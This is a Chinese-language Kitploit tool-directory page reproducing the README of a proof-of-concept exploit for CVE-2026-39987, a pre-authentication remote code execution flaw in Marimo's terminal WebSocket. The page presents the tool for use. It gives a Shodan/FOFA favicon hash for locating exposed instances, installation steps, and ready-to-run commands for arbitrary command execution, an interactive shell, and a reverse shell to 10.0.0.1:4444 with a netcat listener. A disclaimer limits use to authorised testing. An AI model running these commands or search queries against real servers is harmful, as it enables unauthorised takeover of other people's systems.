Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-39987-POC — CVE-2026-39987 漏洞利用工具 - Marimo < 0.23.0 预认证远程代码执行(WebSocket) | Kitploit
工具/GitHubGitHub/m3ph1569/cve-2026-39987-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubm3ph1569/cve-2026-39987-poc

CVE-2026-39987-POC

CVE-2026-39987 漏洞利用工具 - Marimo < 0.23.0 预认证远程代码执行(WebSocket)

查看仓库
211个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-39987 - Marimo < 0.23.0 预认证 RCE(WebSocket)

CVSS Severity Python License

针对 Marimo 0.23.0 之前版本中一个严重预认证远程代码执行(RCE)漏洞的概念验证(PoC)利用程序。

该漏洞允许未经身份验证的攻击者连接到 WebSocket 端点(/terminal/ws),并在目标服务器上执行任意系统命令。

功能特性

  • 自动验证:自动检查目标是否存在漏洞,通过识别版本并验证 Marimo 应用的存在(通过 favicon 和 /api/version 端点)。
  • 单命令执行:向目标发送单个命令并接收输出。
  • 交互式 Shell:生成伪交互式持久 Shell,无缝与目标交互。
  • 反向 Shell 生成:内建支持生成并执行反向 Shell 负载。
  • 验证绕过:使用 --no-check 标志可绕过版本和存在性检查,适用于端点可能被隐藏的环境。

Shodan / FOFA 搜索语法

您可以使用以下搜索语法来识别潜在易受攻击的实例:

root@kitploit:~
http.favicon.hash:-1864630356

安装

建议使用 Python 虚拟环境来安装依赖项。

root@kitploit:~
# 1. 克隆仓库
git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
cd CVE-2026-39987-POC

# 2. 创建并激活虚拟环境
python -m venv .CVE-2026-39987

# Windows
.CVE-2026-39987\Scripts\activate
# Linux/macOS
source .CVE-2026-39987/bin/activate

# 3. 升级 pip 并安装所需依赖
# Windows
py pip install --upgrade pip ; pip install -r requirements.txt
# Linux/MacOS
python3 pip install --upgrade pip && pip install -r requirements.txt

使用方法

root@kitploit:~
usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]

positional arguments:
  target               目标 URL(例如 http://localhost:8080)
  command              要执行的命令(使用 -i 时省略)

options:
  -h, --help           显示此帮助信息并退出
  --no-check           跳过漏洞版本检查

Execution modes:
  -i, --interactive    交互式 Shell 模式
  --revshell IP PORT   生成并发送 bash 反向 Shell 负载

WebSocket tuning:
  --ping-interval SEC  WebSocket ping 间隔(秒,默认:30,更频繁有助于稳定性)
  --ping-timeout SEC   WebSocket ping 超时(秒,默认:300,从原120增加以适应慢速服务器)
  --no-ping            完全禁用 WebSocket ping/pong(如果仍然断连推荐使用)

Reconnect options:
  --max-retries N      最大自动重连尝试次数(默认:5)
  --no-reconnect       在意外断连时禁用自动重连

示例

1. 执行单个命令:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 "id"

2. 启动交互式 Shell:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 -i

3. 执行反向 Shell: 确保您在机器上运行了 netcat 监听器(例如 nc -lvnp 4444)。

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444

4. 跳过验证检查并强制执行:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check

贡献指南

欢迎贡献!请随时提交 Pull Request。

  1. Fork 该仓库
  2. 创建您的特性分支(git checkout -b feature/update-feature)
  3. 提交您的更改(git commit -m 'Add update feature')
  4. 推送到分支(git push origin feature/update-feature)
  5. 打开一个 Pull Request

免责声明

本工具严格用于教育目的和授权的道德黑客行为。作者不对任何滥用、损害或由此脚本引起的非法活动负责。始终确保您已获得系统所有者的明确许可,方可进行任何安全测试。未经授权使用此脚本属违法行为,并将受到法律制裁。

许可证

本项目采用 MIT 许可证 - 详情请参阅 LICENSE 文件。


由 M3PH1569 用 ☕︎ 制作
下载工具